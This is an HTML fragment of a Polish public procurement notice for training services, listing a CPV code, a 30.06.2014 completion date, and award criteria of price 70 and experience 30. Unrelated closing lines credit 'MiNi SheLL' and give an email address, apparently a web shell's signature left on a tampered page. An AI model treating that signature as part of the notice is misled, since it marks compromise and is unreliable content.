<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość wykonanych usług mających za przedmiot usługi szkolenia zgodne z opisem przedmiotu zamówienia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com